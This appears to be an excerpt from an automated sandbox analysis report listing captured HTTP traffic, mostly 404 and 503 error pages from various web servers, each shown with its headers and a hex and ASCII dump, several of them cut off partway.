0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: W/"3fe-5925c7bf8c9e3"Content-Encoding: gzipData Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: Apache/2.4.57 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-234.ec2.internalX-Request-Id: 99d9ea9b-78d9-4e6b-8a6e-78f38b0dd422Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1Content-Language: enData Raw: 31 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 0d 0a 61 66 0d 0a 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 35 0d 0a 77 65 62 6d 61 73 74 65 72 40 66 69 6e 61 6e 63 65 66 61 73 74 2e 63 6f 6d 2e 62 72 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 64 0d 0a 77 65 62 6d 61 73 74 65 72 40 66 69 6e 61
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 26 Nov 2023 05:59:25 GMTContent-Length: 0Connection: keep-alivex-backend: deny_backendStrict-Transport-Security: max-age=31536000; includeSubDomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheX-Powered-By: PleskLinVary: User-AgentTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0
Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.57 (Unix)Content-Length: 299Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 